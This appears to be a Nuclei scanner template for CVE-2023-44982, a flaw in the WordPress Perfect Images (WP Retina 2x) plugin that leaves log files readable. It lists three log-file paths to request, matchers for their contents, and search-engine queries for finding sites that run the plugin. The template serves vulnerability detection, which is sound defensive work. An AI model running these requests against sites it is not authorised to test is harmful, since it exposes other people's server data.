id: CVE-2023-44982

info:
  name: WordPress Perfect Images (WP Retina 2x) < 6.4.6 - Sensitive Information Exposure
  author: pussycat0x
  severity: medium
  description: |
    Jordy Meow Perfect Images (Manage Image Sizes, Thumbnails, Replace, Retina) versions up to 6.4.5 contain a vulnerability that exposes sensitive information to unauthorized actors, letting attackers access confidential data. Exploitation requires no specific conditions.
  impact: |
    Unauthorized actors can access sensitive information, leading to privacy breaches and potential data misuse.
  remediation: |
    Update to version 6.4.6 or later.
  reference:
    - https://wpscan.com/vulnerability/aba0c4a1-e253-4b5b-b46d-239567567b16/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2023-44982
    cwe-id: CWE-200
    epss-score: 0.12906
    epss-percentile: 0.94241
  metadata:
    verified: true
    max-request: 3
    vendor: meowapps
    product: perfect-images
    framework: wordpress
    publicwww-query: "/wp-content/plugins/wp-retina-2x/"
    fofa-query: body="/wp-content/plugins/wp-retina-2x/"
  tags: cve,cve2023,wordpress,wp-plugin,wp-retina-2x

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/wp-retina-2x/classes/wp-retina-2x.log"
      - "{{BaseURL}}/wp-content/uploads/wp-retina-2x.log"
      - "{{BaseURL}}/wp-content/uploads/wp-retina-2x-logs.txt"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "RETINA"
          - "PATH"
          - "thumbnail"
          - "wp-content"
          - "Full-Size"
          - "uploads"
        condition: and

      - type: regex
        part: body
        regex:
          - '\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}:'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100a5e4f2b1295a660ea9dc8d5ef632257ce67b7b206d90bdea693ca9fb5d5dc46f022020c84638c5c986aee354fd420afd6c5f612d8136b8a87fe51b0e03b0e72bfd53:922c64590222798bb761d5b6d8e72950